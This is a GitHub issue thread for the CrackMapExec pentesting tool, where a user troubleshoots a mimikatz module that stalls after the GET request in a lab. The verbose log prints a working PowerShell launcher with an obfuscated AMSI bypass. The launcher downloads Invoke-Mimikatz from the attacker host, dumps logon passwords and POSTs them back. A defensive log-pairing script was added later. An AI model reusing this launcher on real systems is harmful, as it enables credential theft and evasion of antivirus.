byt3bl33d3r / CrackMapExec

A swiss army knife for pentesting networks
BSD 2-Clause "Simplified" License

Never get the POST request #501

Closed ymgh96 closed 2 years ago

ymgh96 commented 3 years ago

Detailed issue explanation

Hello, I try to run the mimikatz module with crackmapexec, but it gets stuck after the GET request and never gets the POST request. Where am I wrong?

Steps to reproduce

  1. Turn off the firewall on victim
  2. Turn off the antivirus (windows defender) on victim

Command string used

crackmapexec --verbose smb 192.168.150.90 -u bob -p XXXX -d lab -M mimikatz --server-port 8080 --server http

CME verbose output (using the --verbose flag)

DEBUG Passed args:
{'aesKey': None,
 'amsi_bypass': None,
 'clear_obfscripts': False,
 'content': False,
 'continue_on_success': False,
 'cred_id': [],
 'darrell': False,
 'depth': None,
 'disks': False,
 'domain': 'lab',
 'exclude_dirs': '',
 'exec_method': None,
 'execute': None,
 'fail_limit': None,
 'force_ps32': False,
 'gen_relay_list': None,
 'get_file': None,
 'gfail_limit': None,
 'groups': None,
 'hash': [],
 'jitter': None,
 'kdcHost': None,
 'kerberos': False,
 'list_modules': False,
 'local_auth': False,
 'local_groups': None,
 'loggedon_users': False,
 'lsa': False,
 'module': 'mimikatz',
 'module_options': [],
 'no_bruteforce': False,
 'no_output': False,
 'ntds': None,
 'obfs': False,
 'only_files': False,
 'pass_pol': False,
 'password': ['XXXX'],
 'pattern': None,
 'port': 445,
 'protocol': 'smb',
 'ps_execute': None,
 'put_file': None,
 'regex': None,
 'rid_brute': None,
 'sam': False,
 'server': 'http',
 'server_host': '0.0.0.0',
 'server_port': 8080,
 'sessions': False,
 'share': 'C$',
 'shares': False,
 'show_module_options': False,
 'smb_server_port': 445,
 'spider': None,
 'spider_folder': '.',
 'target': ['192.168.150.90'],
 'threads': 100,
 'timeout': None,
 'ufail_limit': None,
 'username': ['bob'],
 'users': None,
 'verbose': True,
 'wmi': None,
 'wmi_namespace': 'root\\cimv2'}
DEBUG CME server type: http
DEBUG Using selector: EpollSelector
DEBUG Running
DEBUG Started thread poller
DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104)
DEBUG Error creating SMBv1 connection to 192.168.150.90: Error occurs while reading from remote(104)
SMB         192.168.150.90  445    PC90             [*] Windows 10.0 Build 19041 x64 (name:PC90) (domain:lab) (signing:False) (SMBv1:False)
DEBUG add_credential(credtype=plaintext, domain=LAB, username=bob, password=XXXX, groupid=None, pillaged_from=None) => None
SMB         192.168.150.90  445    PC90             [+] lab\bob:XXXX (Pwn3d!)
DEBUG Generated PS IEX Launcher:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1')
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'
$request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()

DEBUG Generated PS command:
 [Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
try{
[Ref].Assembly.GetType('Sys'+'tem.Man'+'agement.Aut'+'omation.Am'+'siUt'+'ils').GetField('am'+'siIni'+'tFailed', 'NonP'+'ublic,Sta'+'tic').SetValue($null, $true)
}catch{}
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'
IEX (New-Object Net.WebClient).DownloadString('http://192.168.150.2:8080/Invoke-Mimikatz.ps1')
$cmd = Invoke-Mimikatz -Command 'privilege::debug sekurlsa::logonpasswords exit'
$request = [System.Net.WebRequest]::Create('http://192.168.150.2:8080/')
$request.Method = 'POST'
$request.ContentType = 'application/x-www-form-urlencoded'
$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)
$request.ContentLength = $bytes.Length
$requestStream = $request.GetRequestStream()
$requestStream.Write($bytes, 0, $bytes.Length)
$requestStream.Close()
$request.GetResponse()

DEBUG Target system is 192.168.150.90 and isFDQN is False
DEBUG StringBinding: pc90[65356]
DEBUG StringBinding: 172.16.70.30[65356]
DEBUG StringBinding: 192.168.150.90[65356]
DEBUG StringBinding chosen: ncacn_ip_tcp:192.168.150.90[65356]
DEBUG Executed command via wmiexec
DEBUG Executing command: [obfuscated PowerShell launcher omitted]
MIMIKATZ    192.168.150.90  445    PC90             [+] Executed launcher
DEBUG Stopped thread poller
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ    192.168.150.90                          [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)
MIMIKATZ                                            [*] Waiting on 1 host(s)

CME Version (cme --version)

Version: 5.1.7dev Codename: U fancy huh?

OS

Kali 2021.3 Linux 5.10.0-kali9-amd64

Target OS

Windows 10 Version 21H1 (OS Build 19043.1288)
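The verbose log above shows the module's two-phase callback: the target fetches the script over HTTP (the GET) and is then expected to POST its output back to the same listener. As an added example that is not part of CrackMapExec or of this issue, the following Python pairs each script download with its callback per client over a constructed access-log sample, so a defender reviewing web-server or proxy logs can spot clients that fetched a .ps1 and then posted back to the same origin, and anyone troubleshooting this report can see which hosts fetched but never called back. The access-log line format and the sample lines are assumptions.

```python
import re

# Assumed access-log shape: <client> <epoch-seconds> "<METHOD> <path> HTTP/1.x" <status>
# Constructed sample: the first client mirrors this issue (GET served, no POST ever arrives).
SAMPLE_LOG = """\
192.168.150.90 1000 "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
10.0.0.7 1010 "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200
10.0.0.7 1025 "POST / HTTP/1.1" 200
10.0.0.9 1030 "GET /index.html HTTP/1.1" 200
10.0.0.9 1031 "POST /login HTTP/1.1" 302
"""

LINE_RE = re.compile(r'^(\S+) (\d+) "(GET|POST) (\S+) HTTP/1\.[01]" (\d{3})$')


def parse_access_log(text):
    """Yield (client, epoch_seconds, method, path); malformed lines are skipped."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.group(1), int(m.group(2)), m.group(3), m.group(4)


def pair_launcher_requests(text, window=60):
    """Map each client that downloaded a .ps1 to ('completed', delay_seconds) if it
    POSTed back within `window` seconds, or ('no_callback', None) if it never did."""
    pending = {}   # client -> timestamp of its .ps1 download, awaiting a POST
    result = {}
    for client, ts, method, path in parse_access_log(text):
        if method == "GET" and path.lower().endswith(".ps1"):
            pending[client] = ts
            result[client] = ("no_callback", None)   # until a POST proves otherwise
        elif method == "POST" and client in pending:
            delay = ts - pending.pop(client)
            if delay <= window:
                result[client] = ("completed", delay)
            # a POST arriving after the window is not treated as this launcher's callback
    return result


if __name__ == "__main__":
    for client, (state, delay) in pair_launcher_requests(SAMPLE_LOG).items():
        suffix = f" after {delay}s" if delay is not None else ""
        print(f"{client}: {state}{suffix}")
```

Clients that fetched an ordinary page and posted elsewhere (10.0.0.9 in the sample) are ignored, so the pairing only fires on the download-then-callback sequence the launcher produces.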

mpgn commented 3 years ago

The Mimikatz module is old and deprecated, try with the lsassy module!